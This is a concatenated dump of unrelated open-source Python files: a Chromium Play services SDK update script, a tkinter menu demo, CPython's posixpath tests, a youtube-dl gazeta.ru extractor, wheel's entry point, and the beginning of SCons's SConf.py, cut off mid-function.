def _UploadToBucket(bucket_path, files_to_upload, is_dry_run):
'''Uploads the files designated by the provided paths to a cloud bucket. '''
upload_to_google_storage.upload_to_google_storage(
input_filenames=files_to_upload,
base_url=bucket_path,
gsutil=_InitGsutil(is_dry_run),
force=False,
use_md5=False,
num_threads=1,
skip_hashing=False,
gzip=None)
def _InitGsutil(is_dry_run):
'''Initialize the Gsutil object as regular or dummy version for dry runs. '''
if is_dry_run:
return DummyGsutil()
else:
return download_from_google_storage.Gsutil(
download_from_google_storage.GSUTIL_DEFAULT_PATH)
def _ExtractLicenseFile(license_path, prop_file_path):
with open(prop_file_path, 'r') as prop_file:
prop_file_content = prop_file.read()
match = LICENSE_PATTERN.search(prop_file_content)
if not match:
raise AttributeError('The license was not found in ' +
os.path.abspath(prop_file_path))
with open(license_path, 'w') as license_file:
license_file.write(match.group('text'))
def _CheckLicenseAgreement(expected_license_path, actual_license_path,
version_number):
'''
Checks that the new license is the one already accepted by the user. If it
isn't, it prompts the user to accept it. Returns whether the expected license
has been accepted.
'''
if utils.FileEquals(expected_license_path, actual_license_path):
return True
with open(expected_license_path) as license_file:
# Uses plain print rather than logging to make sure this is not formatted
# by the logger.
print ('Updating the Google Play services SDK to '
'version %s.' % version_number)
# The output is buffered when running as part of gclient hooks. We split
# the text here and flush it explicitly to avoid having part of it dropped
# out.
# Note: text contains *escaped* new lines, so we split by '\\n', not '\n'.
for license_part in license_file.read().split('\\n'):
print license_part
sys.stdout.flush()
# Need to put the prompt on a separate line, otherwise the gclient hook buffer
# only prints it after we receive an input.
print ('Do you accept the license for version %s of the Google Play services '
'client library? [y/n]: ' % version_number)
sys.stdout.flush()
return raw_input('> ') in ('Y', 'y')
def _IsBotEnvironment():
return bool(os.environ.get('CHROME_HEADLESS'))
def _VerifyBucketPathFormat(bucket_name, version_number, is_dry_run):
'''
Formats and checks the download/upload path depending on whether we are
running in dry run mode or not. Returns a supposedly safe path to use with
Gsutil.
'''
if is_dry_run:
bucket_path = os.path.abspath(os.path.join(bucket_name,
str(version_number)))
if not os.path.isdir(bucket_path):
os.makedirs(bucket_path)
else:
if bucket_name.startswith('gs://'):
# We enforce the syntax without gs:// for consistency with the standalone
# download/upload scripts and to make dry run transition easier.
raise AttributeError('Please provide the bucket name without the gs:// '
'prefix (e.g. %s)' % GMS_CLOUD_STORAGE)
bucket_path = 'gs://%s/%s' % (bucket_name, version_number)
return bucket_path
def _ZipLibrary(zip_name, files, zip_root):
with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zipf:
for file_name in files:
zipf.write(file_name, os.path.relpath(file_name, zip_root))
class PlayServicesPaths(object):
'''
Describes the different paths to be used in the update process.
Filesystem hierarchy | Exposed property / notes
---------------------------------------------------|-------------------------
[sdk_root] | sdk_root / (1)
+- extras |
+- google |
+- m2repository | package / (2)
+- source.properties | source_prop / (3)
+- LICENSE | license / (4)
+- google_play_services_library.zip.sha1 | lib_zip_sha1 / (5)
+- com/google/android/gms/ |
+- [play-services-foo] |
+- [X.Y.Z] |
+- play-services-foo-X.Y.Z.aar | client_paths / (6)
Notes:
1. sdk_root: Path provided as a parameter to the script (--sdk_root)
2. package: This directory contains the Google Play services SDK itself.
When downloaded via the Android SDK manager, it will be a complete Maven
repository with the different versions of the library. When the update
script downloads the library from our cloud storage, it is cleared.
3. source_prop: File created by the Android SDK manager that contains
the package information, such as the version info and the license.
4. license: File created by the update script. Contains the license accepted
by the user.
5. lib_zip_sha1: sha1 of the library that has been installed by the
update script. It is compared with the one required by the config file to
check if an update is necessary.
6. client_paths: The client library jars we care about. They are zipped
together and uploaded to the cloud storage.
'''
def __init__(self, sdk_root, version_number, client_names):
'''
sdk_root: path to the root of the sdk directory
version_number: version of the library supposed to be installed locally.
client_names: names of client libraries to be uploaded. See
utils.ConfigParser for more info.
'''
relative_package = os.path.join('extras', 'google', 'm2repository')
self.sdk_root = sdk_root
self.version_number = version_number
self.package = os.path.join(sdk_root, relative_package)
self.lib_zip_sha1 = os.path.join(self.package, ZIP_FILE_NAME + '.sha1')
self.license = os.path.join(self.package, LICENSE_FILE_NAME)
self.source_prop = os.path.join(self.package, 'source.properties')
self.client_paths = []
for client in client_names:
self.client_paths.append(os.path.join(
self.package, 'com', 'google', 'android', 'gms', client,
version_number, '%s-%s.aar' % (client, version_number)))
def __repr__(self):
return ("\nsdk_root: " + self.sdk_root +
"\nversion_number: " + self.version_number +
"\npackage: " + self.package +
"\nlib_zip_sha1: " + self.lib_zip_sha1 +
"\nlicense: " + self.license +
"\nsource_prop: " + self.source_prop +
"\nclient_paths: \n - " + '\n - '.join(self.client_paths))
class DummyGsutil(download_from_google_storage.Gsutil):
'''
Class that replaces Gsutil to use a local directory instead of an online
bucket. It relies on the fact that Gsutil commands are very similar to shell
ones, so for the ones used here (ls, cp), it works to just use them with a
local directory.
'''
def __init__(self):
super(DummyGsutil, self).__init__(
download_from_google_storage.GSUTIL_DEFAULT_PATH)
def call(self, *args):
logging.debug('Calling command "%s"', str(args))
return cmd_helper.GetCmdStatusOutputAndError(args)
def check_call(self, *args):
logging.debug('Calling command "%s"', str(args))
return cmd_helper.GetCmdStatusOutputAndError(args)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
simontakite/sysadmin
|
refs/heads/master
|
pythonscripts/learningPython/Gui/Tools/big_gui.py
|
2
|
"""
GUI demo implementation - combines maker, mixin, and this
"""
import sys, os
from tkinter import * # widget classes
from PP4E.Gui.Tools.guimixin import * # mix-in methods: quit, spawn, etc.
from PP4E.Gui.Tools.guimaker import * # frame, plus menu/toolbar builder
class Hello(GuiMixin, GuiMakerWindowMenu): # or GuiMakerFrameMenu
def start(self):
self.hellos = 0
self.master.title("GuiMaker Demo")
self.master.iconname("GuiMaker")
def spawnme(): self.spawn('big_gui.py') # defer call vs lambda
self.menuBar = [ # a tree: 3 pull downs
('File', 0, # (pull-down)
[('New...', 0, spawnme),
('Open...', 0, self.fileOpen), # [menu items list]
('Quit', 0, self.quit)] # label,underline,action
),
('Edit', 0,
[('Cut', -1, self.notdone), # no underline|action
('Paste', -1, self.notdone), # lambda:0 works too
'separator', # add a separator
('Stuff', -1,
[('Clone', -1, self.clone), # cascaded submenu
('More', -1, self.more)]
),
('Delete', -1, lambda:0),
[5]] # disable 'delete'
),
('Play', 0,
[('Hello', 0, self.greeting),
('Popup...', 0, self.dialog),
('Demos', 0,
[('Toplevels', 0,
lambda: self.spawn(r'..\Tour\toplevel2.py')),
('Frames', 0,
lambda: self.spawn(r'..\Tour\demoAll-frm-ridge.py')),
('Images', 0,
lambda: self.spawn(r'..\Tour\buttonpics.py')),
('Alarm', 0,
lambda: self.spawn(r'..\Tour\alarm.py', wait=False)),
('Other...', -1, self.pickDemo)]
)]
)]
self.toolBar = [ # add 3 buttons
('Quit', self.quit, dict(side=RIGHT)), # or {'side': RIGHT}
('Hello', self.greeting, dict(side=LEFT)),
('Popup', self.dialog, dict(side=LEFT, expand=YES)) ]
def makeWidgets(self): # override default
middle = Label(self, text='Hello maker world!', # middle of window
width=40, height=10,
relief=SUNKEN, cursor='pencil', bg='white')
middle.pack(expand=YES, fill=BOTH)
def greeting(self):
self.hellos += 1
if self.hellos % 3:
print("hi")
else:
self.infobox("Three", 'HELLO!') # on every third press
def dialog(self):
button = self.question('OOPS!',
'You typed "rm*" ... continue?', # old style
'questhead', ('yes', 'no')) # args ignored
[lambda: None, self.quit][button]()
def fileOpen(self):
pick = self.selectOpenFile(file='big_gui.py')
if pick:
self.browser(pick) # browse my source file, or other
def more(self):
new = Toplevel()
Label(new, text='A new non-modal window').pack()
Button(new, text='Quit', command=self.quit).pack(side=LEFT)
Button(new, text='More', command=self.more).pack(side=RIGHT)
def pickDemo(self):
pick = self.selectOpenFile(dir='..')
if pick:
self.spawn(pick) # spawn any Python program
if __name__ == '__main__': Hello().mainloop() # make one, run one
|
xxd3vin/spp-sdk
|
refs/heads/master
|
opt/Python27/Lib/test/test_posixpath.py
|
36
|
import unittest
from test import test_support, test_genericpath
import posixpath, os
from posixpath import realpath, abspath, dirname, basename
# An absolute path to a temporary filename for testing. We can't rely on TESTFN
# being an absolute path, so we need this.
ABSTFN = abspath(test_support.TESTFN)
def safe_rmdir(dirname):
try:
os.rmdir(dirname)
except OSError:
pass
class PosixPathTest(unittest.TestCase):
def setUp(self):
self.tearDown()
def tearDown(self):
for suffix in ["", "1", "2"]:
test_support.unlink(test_support.TESTFN + suffix)
safe_rmdir(test_support.TESTFN + suffix)
def test_join(self):
self.assertEqual(posixpath.join("/foo", "bar", "/bar", "baz"), "/bar/baz")
self.assertEqual(posixpath.join("/foo", "bar", "baz"), "/foo/bar/baz")
self.assertEqual(posixpath.join("/foo/", "bar/", "baz/"), "/foo/bar/baz/")
def test_split(self):
self.assertEqual(posixpath.split("/foo/bar"), ("/foo", "bar"))
self.assertEqual(posixpath.split("/"), ("/", ""))
self.assertEqual(posixpath.split("foo"), ("", "foo"))
self.assertEqual(posixpath.split("////foo"), ("////", "foo"))
self.assertEqual(posixpath.split("//foo//bar"), ("//foo", "bar"))
def splitextTest(self, path, filename, ext):
self.assertEqual(posixpath.splitext(path), (filename, ext))
self.assertEqual(posixpath.splitext("/" + path), ("/" + filename, ext))
self.assertEqual(posixpath.splitext("abc/" + path), ("abc/" + filename, ext))
self.assertEqual(posixpath.splitext("abc.def/" + path), ("abc.def/" + filename, ext))
self.assertEqual(posixpath.splitext("/abc.def/" + path), ("/abc.def/" + filename, ext))
self.assertEqual(posixpath.splitext(path + "/"), (filename + ext + "/", ""))
def test_splitext(self):
self.splitextTest("foo.bar", "foo", ".bar")
self.splitextTest("foo.boo.bar", "foo.boo", ".bar")
self.splitextTest("foo.boo.biff.bar", "foo.boo.biff", ".bar")
self.splitextTest(".csh.rc", ".csh", ".rc")
self.splitextTest("nodots", "nodots", "")
self.splitextTest(".cshrc", ".cshrc", "")
self.splitextTest("...manydots", "...manydots", "")
self.splitextTest("...manydots.ext", "...manydots", ".ext")
self.splitextTest(".", ".", "")
self.splitextTest("..", "..", "")
self.splitextTest("........", "........", "")
self.splitextTest("", "", "")
def test_isabs(self):
self.assertIs(posixpath.isabs(""), False)
self.assertIs(posixpath.isabs("/"), True)
self.assertIs(posixpath.isabs("/foo"), True)
self.assertIs(posixpath.isabs("/foo/bar"), True)
self.assertIs(posixpath.isabs("foo/bar"), False)
def test_basename(self):
self.assertEqual(posixpath.basename("/foo/bar"), "bar")
self.assertEqual(posixpath.basename("/"), "")
self.assertEqual(posixpath.basename("foo"), "foo")
self.assertEqual(posixpath.basename("////foo"), "foo")
self.assertEqual(posixpath.basename("//foo//bar"), "bar")
def test_dirname(self):
self.assertEqual(posixpath.dirname("/foo/bar"), "/foo")
self.assertEqual(posixpath.dirname("/"), "/")
self.assertEqual(posixpath.dirname("foo"), "")
self.assertEqual(posixpath.dirname("////foo"), "////")
self.assertEqual(posixpath.dirname("//foo//bar"), "//foo")
def test_islink(self):
self.assertIs(posixpath.islink(test_support.TESTFN + "1"), False)
f = open(test_support.TESTFN + "1", "wb")
try:
f.write("foo")
f.close()
self.assertIs(posixpath.islink(test_support.TESTFN + "1"), False)
if hasattr(os, "symlink"):
os.symlink(test_support.TESTFN + "1", test_support.TESTFN + "2")
self.assertIs(posixpath.islink(test_support.TESTFN + "2"), True)
os.remove(test_support.TESTFN + "1")
self.assertIs(posixpath.islink(test_support.TESTFN + "2"), True)
self.assertIs(posixpath.exists(test_support.TESTFN + "2"), False)
self.assertIs(posixpath.lexists(test_support.TESTFN + "2"), True)
finally:
if not f.close():
f.close()
def test_samefile(self):
f = open(test_support.TESTFN + "1", "wb")
try:
f.write("foo")
f.close()
self.assertIs(
posixpath.samefile(
test_support.TESTFN + "1",
test_support.TESTFN + "1"
),
True
)
# If we don't have links, assume that os.stat doesn't return reasonable
# inode information and thus that samefile() doesn't work
if hasattr(os, "symlink"):
os.symlink(
test_support.TESTFN + "1",
test_support.TESTFN + "2"
)
self.assertIs(
posixpath.samefile(
test_support.TESTFN + "1",
test_support.TESTFN + "2"
),
True
)
os.remove(test_support.TESTFN + "2")
f = open(test_support.TESTFN + "2", "wb")
f.write("bar")
f.close()
self.assertIs(
posixpath.samefile(
test_support.TESTFN + "1",
test_support.TESTFN + "2"
),
False
)
finally:
if not f.close():
f.close()
def test_samestat(self):
f = open(test_support.TESTFN + "1", "wb")
try:
f.write("foo")
f.close()
self.assertIs(
posixpath.samestat(
os.stat(test_support.TESTFN + "1"),
os.stat(test_support.TESTFN + "1")
),
True
)
# If we don't have links, assume that os.stat() doesn't return reasonable
# inode information and thus that samestat() doesn't work
if hasattr(os, "symlink"):
if hasattr(os, "symlink"):
os.symlink(test_support.TESTFN + "1", test_support.TESTFN + "2")
self.assertIs(
posixpath.samestat(
os.stat(test_support.TESTFN + "1"),
os.stat(test_support.TESTFN + "2")
),
True
)
os.remove(test_support.TESTFN + "2")
f = open(test_support.TESTFN + "2", "wb")
f.write("bar")
f.close()
self.assertIs(
posixpath.samestat(
os.stat(test_support.TESTFN + "1"),
os.stat(test_support.TESTFN + "2")
),
False
)
finally:
if not f.close():
f.close()
def test_ismount(self):
self.assertIs(posixpath.ismount("/"), True)
def test_expanduser(self):
self.assertEqual(posixpath.expanduser("foo"), "foo")
try:
import pwd
except ImportError:
pass
else:
self.assertIsInstance(posixpath.expanduser("~/"), basestring)
# if home directory == root directory, this test makes no sense
if posixpath.expanduser("~") != '/':
self.assertEqual(
posixpath.expanduser("~") + "/",
posixpath.expanduser("~/")
)
self.assertIsInstance(posixpath.expanduser("~root/"), basestring)
self.assertIsInstance(posixpath.expanduser("~foo/"), basestring)
with test_support.EnvironmentVarGuard() as env:
env['HOME'] = '/'
self.assertEqual(posixpath.expanduser("~"), "/")
def test_normpath(self):
self.assertEqual(posixpath.normpath(""), ".")
self.assertEqual(posixpath.normpath("/"), "/")
self.assertEqual(posixpath.normpath("//"), "//")
self.assertEqual(posixpath.normpath("///"), "/")
self.assertEqual(posixpath.normpath("///foo/.//bar//"), "/foo/bar")
self.assertEqual(posixpath.normpath("///foo/.//bar//.//..//.//baz"), "/foo/baz")
self.assertEqual(posixpath.normpath("///..//./foo/.//bar"), "/foo/bar")
if hasattr(os, "symlink"):
def test_realpath_basic(self):
# Basic operation.
try:
os.symlink(ABSTFN+"1", ABSTFN)
self.assertEqual(realpath(ABSTFN), ABSTFN+"1")
finally:
test_support.unlink(ABSTFN)
def test_realpath_symlink_loops(self):
# Bug #930024, return the path unchanged if we get into an infinite
# symlink loop.
try:
old_path = abspath('.')
os.symlink(ABSTFN, ABSTFN)
self.assertEqual(realpath(ABSTFN), ABSTFN)
os.symlink(ABSTFN+"1", ABSTFN+"2")
os.symlink(ABSTFN+"2", ABSTFN+"1")
self.assertEqual(realpath(ABSTFN+"1"), ABSTFN+"1")
self.assertEqual(realpath(ABSTFN+"2"), ABSTFN+"2")
# Test using relative path as well.
os.chdir(dirname(ABSTFN))
self.assertEqual(realpath(basename(ABSTFN)), ABSTFN)
finally:
os.chdir(old_path)
test_support.unlink(ABSTFN)
test_support.unlink(ABSTFN+"1")
test_support.unlink(ABSTFN+"2")
def test_realpath_resolve_parents(self):
# We also need to resolve any symlinks in the parents of a relative
# path passed to realpath. E.g.: current working directory is
# /usr/doc with 'doc' being a symlink to /usr/share/doc. We call
# realpath("a"). This should return /usr/share/doc/a/.
try:
old_path = abspath('.')
os.mkdir(ABSTFN)
os.mkdir(ABSTFN + "/y")
os.symlink(ABSTFN + "/y", ABSTFN + "/k")
os.chdir(ABSTFN + "/k")
self.assertEqual(realpath("a"), ABSTFN + "/y/a")
finally:
os.chdir(old_path)
test_support.unlink(ABSTFN + "/k")
safe_rmdir(ABSTFN + "/y")
safe_rmdir(ABSTFN)
def test_realpath_resolve_before_normalizing(self):
# Bug #990669: Symbolic links should be resolved before we
# normalize the path. E.g.: if we have directories 'a', 'k' and 'y'
# in the following hierarchy:
# a/k/y
#
# and a symbolic link 'link-y' pointing to 'y' in directory 'a',
# then realpath("link-y/..") should return 'k', not 'a'.
try:
old_path = abspath('.')
os.mkdir(ABSTFN)
os.mkdir(ABSTFN + "/k")
os.mkdir(ABSTFN + "/k/y")
os.symlink(ABSTFN + "/k/y", ABSTFN + "/link-y")
# Absolute path.
self.assertEqual(realpath(ABSTFN + "/link-y/.."), ABSTFN + "/k")
# Relative path.
os.chdir(dirname(ABSTFN))
self.assertEqual(realpath(basename(ABSTFN) + "/link-y/.."),
ABSTFN + "/k")
finally:
os.chdir(old_path)
test_support.unlink(ABSTFN + "/link-y")
safe_rmdir(ABSTFN + "/k/y")
safe_rmdir(ABSTFN + "/k")
safe_rmdir(ABSTFN)
def test_realpath_resolve_first(self):
# Bug #1213894: The first component of the path, if not absolute,
# must be resolved too.
try:
old_path = abspath('.')
os.mkdir(ABSTFN)
os.mkdir(ABSTFN + "/k")
os.symlink(ABSTFN, ABSTFN + "link")
os.chdir(dirname(ABSTFN))
base = basename(ABSTFN)
self.assertEqual(realpath(base + "link"), ABSTFN)
self.assertEqual(realpath(base + "link/k"), ABSTFN + "/k")
finally:
os.chdir(old_path)
test_support.unlink(ABSTFN + "link")
safe_rmdir(ABSTFN + "/k")
safe_rmdir(ABSTFN)
def test_relpath(self):
(real_getcwd, os.getcwd) = (os.getcwd, lambda: r"/home/user/bar")
try:
curdir = os.path.split(os.getcwd())[-1]
self.assertRaises(ValueError, posixpath.relpath, "")
self.assertEqual(posixpath.relpath("a"), "a")
self.assertEqual(posixpath.relpath(posixpath.abspath("a")), "a")
self.assertEqual(posixpath.relpath("a/b"), "a/b")
self.assertEqual(posixpath.relpath("../a/b"), "../a/b")
self.assertEqual(posixpath.relpath("a", "../b"), "../"+curdir+"/a")
self.assertEqual(posixpath.relpath("a/b", "../c"), "../"+curdir+"/a/b")
self.assertEqual(posixpath.relpath("a", "b/c"), "../../a")
self.assertEqual(posixpath.relpath("a", "a"), ".")
self.assertEqual(posixpath.relpath("/foo/bar/bat", "/x/y/z"), '../../../foo/bar/bat')
self.assertEqual(posixpath.relpath("/foo/bar/bat", "/foo/bar"), 'bat')
self.assertEqual(posixpath.relpath("/foo/bar/bat", "/"), 'foo/bar/bat')
self.assertEqual(posixpath.relpath("/", "/foo/bar/bat"), '../../..')
self.assertEqual(posixpath.relpath("/foo/bar/bat", "/x"), '../foo/bar/bat')
self.assertEqual(posixpath.relpath("/x", "/foo/bar/bat"), '../../../x')
self.assertEqual(posixpath.relpath("/", "/"), '.')
self.assertEqual(posixpath.relpath("/a", "/a"), '.')
self.assertEqual(posixpath.relpath("/a/b", "/a/b"), '.')
finally:
os.getcwd = real_getcwd
class PosixCommonTest(test_genericpath.CommonTest):
pathmodule = posixpath
attributes = ['relpath', 'samefile', 'sameopenfile', 'samestat']
def test_main():
test_support.run_unittest(PosixPathTest, PosixCommonTest)
if __name__=="__main__":
test_main()
|
fast90/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/gazeta.py
|
23
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class GazetaIE(InfoExtractor):
_VALID_URL = r'(?P<url>https?://(?:www\.)?gazeta\.ru/(?:[^/]+/)?video/(?:main/)*(?:\d{4}/\d{2}/\d{2}/)?(?P<id>[A-Za-z0-9-_.]+)\.s?html)'
_TESTS = [{
'url': 'http://www.gazeta.ru/video/main/zadaite_vopros_vladislavu_yurevichu.shtml',
'md5': 'd49c9bdc6e5a7888f27475dc215ee789',
'info_dict': {
'id': '205566',
'ext': 'mp4',
'title': '«70–80 процентов гражданских в Донецке на грани голода»',
'description': 'md5:38617526050bd17b234728e7f9620a71',
'thumbnail': 're:^https?://.*\.jpg',
},
'skip': 'video not found',
}, {
'url': 'http://www.gazeta.ru/lifestyle/video/2015/03/08/master-klass_krasivoi_byt._delaem_vesennii_makiyazh.shtml',
'only_matching': True,
}, {
'url': 'http://www.gazeta.ru/video/main/main/2015/06/22/platit_ili_ne_platit_po_isku_yukosa.shtml',
'md5': '37f19f78355eb2f4256ee1688359f24c',
'info_dict': {
'id': '252048',
'ext': 'mp4',
'title': '"Если по иску ЮКОСа придется платить, это будет большой удар по бюджету"',
},
'add_ie': ['EaglePlatform'],
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
display_id = mobj.group('id')
embed_url = '%s?p=embed' % mobj.group('url')
embed_page = self._download_webpage(
embed_url, display_id, 'Downloading embed page')
video_id = self._search_regex(
r'<div[^>]*?class="eagleplayer"[^>]*?data-id="([^"]+)"', embed_page, 'video id')
return self.url_result(
'eagleplatform:gazeta.media.eagleplatform.com:%s' % video_id, 'EaglePlatform')
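# A minimal sketch (not part of the extractor) of how _VALID_URL is used above:
# it captures both the full page URL and the display id. 'sample_url' below is
# a hypothetical address, shown only to illustrate the named groups.
#
#   sample_url = 'http://www.gazeta.ru/video/main/some_video.shtml'
#   mobj = re.match(GazetaIE._VALID_URL, sample_url)
#   assert mobj.group('id') == 'some_video'
#   assert mobj.group('url') == sample_url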
|
BaichuanWu/Blog_on_django
|
refs/heads/master
|
site-packages/wheel/__main__.py
|
565
|
"""
Wheel command line tool (enable python -m wheel syntax)
"""
import sys
def main(): # needed for console script
if __package__ == '':
# To be able to run 'python wheel-0.9.whl/wheel':
import os.path
path = os.path.dirname(os.path.dirname(__file__))
sys.path[0:0] = [path]
import wheel.tool
sys.exit(wheel.tool.main())
if __name__ == "__main__":
sys.exit(main())
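# Illustrative invocations (assuming the wheel package is installed):
#
#   python -m wheel --help
#   python wheel-0.9.whl/wheel --help   # the __package__ == '' case handled above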
|
NullNoname/dolphin
|
refs/heads/master
|
Externals/scons-local/scons-local-2.0.1/SCons/SConf.py
|
61
|
"""SCons.SConf
Autoconf-like configuration support.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/SConf.py 5134 2010/08/16 23:02:40 bdeegan"
import SCons.compat
import io
import os
import re
import sys
import traceback
import SCons.Action
import SCons.Builder
import SCons.Errors
import SCons.Job
import SCons.Node.FS
import SCons.Taskmaster
import SCons.Util
import SCons.Warnings
import SCons.Conftest
from SCons.Debug import Trace
# Turn off the Conftest error logging
SCons.Conftest.LogInputFiles = 0
SCons.Conftest.LogErrorMessages = 0
# Set
build_type = None
build_types = ['clean', 'help']
def SetBuildType(type):
global build_type
build_type = type
# to be set, if we are in dry-run mode
dryrun = 0
AUTO=0 # use SCons dependency scanning for up-to-date checks
FORCE=1 # force all tests to be rebuilt
CACHE=2 # force all tests to be taken from cache (raise an error, if necessary)
cache_mode = AUTO
def SetCacheMode(mode):
"""Set the Configure cache mode. mode must be one of "auto", "force",
or "cache"."""
global cache_mode
if mode == "auto":
cache_mode = AUTO
elif mode == "force":
cache_mode = FORCE
elif mode == "cache":
cache_mode = CACHE
else:
raise ValueError("SCons.SConf.SetCacheMode: Unknown mode " + mode)
progress_display = SCons.Util.display # will be overwritten by SCons.Script
def SetProgressDisplay(display):
"""Set the progress display to use (called from SCons.Script)"""
global progress_display
progress_display = display
SConfFS = None
_ac_build_counter = 0 # incremented, whenever TryBuild is called
_ac_config_logs = {} # all config.log files created in this build
_ac_config_hs = {} # all config.h files created in this build
sconf_global = None # current sconf object
def _createConfigH(target, source, env):
t = open(str(target[0]), "w")
defname = re.sub('[^A-Za-z0-9_]', '_', str(target[0]).upper())
t.write("""#ifndef %(DEFNAME)s_SEEN
#define %(DEFNAME)s_SEEN
""" % {'DEFNAME' : defname})
t.write(source[0].get_contents())
t.write("""
#endif /* %(DEFNAME)s_SEEN */
""" % {'DEFNAME' : defname})
t.close()
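# Illustrative result (hypothetical symbol): for a target file named "config.h"
# whose accumulated source text is '#define HAVE_FOO 1\n', _createConfigH
# writes roughly:
#
#   #ifndef CONFIG_H_SEEN
#   #define CONFIG_H_SEEN
#   #define HAVE_FOO 1
#   #endif /* CONFIG_H_SEEN */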
def _stringConfigH(target, source, env):
return "scons: Configure: creating " + str(target[0])
def CreateConfigHBuilder(env):
"""Called just before the building targets phase begins."""
if len(_ac_config_hs) == 0:
return
action = SCons.Action.Action(_createConfigH,
_stringConfigH)
sconfigHBld = SCons.Builder.Builder(action=action)
env.Append( BUILDERS={'SConfigHBuilder':sconfigHBld} )
for k in _ac_config_hs.keys():
env.SConfigHBuilder(k, env.Value(_ac_config_hs[k]))
class SConfWarning(SCons.Warnings.Warning):
pass
SCons.Warnings.enableWarningClass(SConfWarning)
# some error definitions
class SConfError(SCons.Errors.UserError):
def __init__(self,msg):
SCons.Errors.UserError.__init__(self,msg)
class ConfigureDryRunError(SConfError):
"""Raised when a file or directory needs to be updated during a Configure
process, but the user requested a dry-run"""
def __init__(self,target):
if not isinstance(target, SCons.Node.FS.File):
msg = 'Cannot create configure directory "%s" within a dry-run.' % str(target)
else:
msg = 'Cannot update configure test "%s" within a dry-run.' % str(target)
SConfError.__init__(self,msg)
class ConfigureCacheError(SConfError):
"""Raised when a use explicitely requested the cache feature, but the test
is run the first time."""
def __init__(self,target):
SConfError.__init__(self, '"%s" is not yet built and cache is forced.' % str(target))
# define actions for building text files
def _createSource( target, source, env ):
fd = open(str(target[0]), "w")
fd.write(source[0].get_contents())
fd.close()
def _stringSource( target, source, env ):
return (str(target[0]) + ' <-\n |' +
source[0].get_contents().replace( '\n', "\n |" ) )
class SConfBuildInfo(SCons.Node.FS.FileBuildInfo):
"""
Special build info for targets of configure tests. Additional members
are result (did the builder succeed last time?) and string, which
contains messages of the original build phase.
"""
result = None # -> 0/None -> no error, != 0 error
string = None # the stdout / stderr output when building the target
def set_build_result(self, result, string):
self.result = result
self.string = string
class Streamer(object):
"""
'Sniffer' for a file-like writable object. Similar to the unix tool tee.
"""
def __init__(self, orig):
self.orig = orig
self.s = io.StringIO()
def write(self, str):
if self.orig:
self.orig.write(str)
self.s.write(str)
def writelines(self, lines):
for l in lines:
self.write(l + '\n')
def getvalue(self):
"""
Return everything written to orig since the Streamer was created.
"""
return self.s.getvalue()
def flush(self):
if self.orig:
self.orig.flush()
self.s.flush()
class SConfBuildTask(SCons.Taskmaster.AlwaysTask):
"""
This is almost the same as SCons.Script.BuildTask. Handles SConfErrors
correctly and knows about the current cache_mode.
"""
def display(self, message):
if sconf_global.logstream:
sconf_global.logstream.write("scons: Configure: " + message + "\n")
def display_cached_string(self, bi):
"""
Logs the original builder messages, given the SConfBuildInfo instance
bi.
"""
if not isinstance(bi, SConfBuildInfo):
SCons.Warnings.warn(SConfWarning,
"The stored build information has an unexpected class: %s" % bi.__class__)
else:
self.display("The original builder output was:\n" +
(" |" + str(bi.string)).replace("\n", "\n |"))
def failed(self):
# check if the reason was a ConfigureDryRunError or a
# ConfigureCacheError and if so, re-raise the exception
exc_type = self.exc_info()[0]
if issubclass(exc_type, SConfError):
raise
elif issubclass(exc_type, SCons.Errors.BuildError):
# we ignore Build Errors (these occur when a test doesn't pass)
# Clear the exception to prevent the contained traceback
# from building a reference cycle.
self.exc_clear()
else:
self.display('Caught exception while building "%s":\n' %
self.targets[0])
try:
excepthook = sys.excepthook
except AttributeError:
# Earlier versions of Python don't have sys.excepthook...
def excepthook(type, value, tb):
traceback.print_tb(tb)
print type, value
excepthook(*self.exc_info())
return SCons.Taskmaster.Task.failed(self)
def collect_node_states(self):
# returns (is_up_to_date, cached_error, cachable)
# where is_up_to_date is 1, if the node(s) are up_to_date
# cached_error is 1, if the node(s) are up_to_date, but the
# build will fail
# cachable is 0, if some nodes are not in our cache
T = 0
changed = False
cached_error = False
cachable = True
for t in self.targets:
if T: Trace('%s' % (t))
bi = t.get_stored_info().binfo
if isinstance(bi, SConfBuildInfo):
if T: Trace(': SConfBuildInfo')
if cache_mode == CACHE:
t.set_state(SCons.Node.up_to_date)
if T: Trace(': set_state(up_to-date)')
else:
if T: Trace(': get_state() %s' % t.get_state())
if T: Trace(': changed() %s' % t.changed())
if (t.get_state() != SCons.Node.up_to_date and t.changed()):
changed = True
if T: Trace(': changed %s' % changed)
cached_error = cached_error or bi.result
else:
if T: Trace(': else')
# the node hasn't been built in a SConf context or doesn't
# exist
cachable = False
changed = ( t.get_state() != SCons.Node.up_to_date )
if T: Trace(': changed %s' % changed)
if T: Trace('\n')
return (not changed, cached_error, cachable)
def execute(self):
if not self.targets[0].has_builder():
return
sconf = sconf_global
is_up_to_date, cached_error, cachable = self.collect_node_states()
if cache_mode == CACHE and not cachable:
raise ConfigureCacheError(self.targets[0])
elif cache_mode == FORCE:
is_up_to_date = 0
if cached_error and is_up_to_date:
self.display("Building \"%s\" failed in a previous run and all "
"its sources are up to date." % str(self.targets[0]))
binfo = self.targets[0].get_stored_info().binfo
self.display_cached_string(binfo)
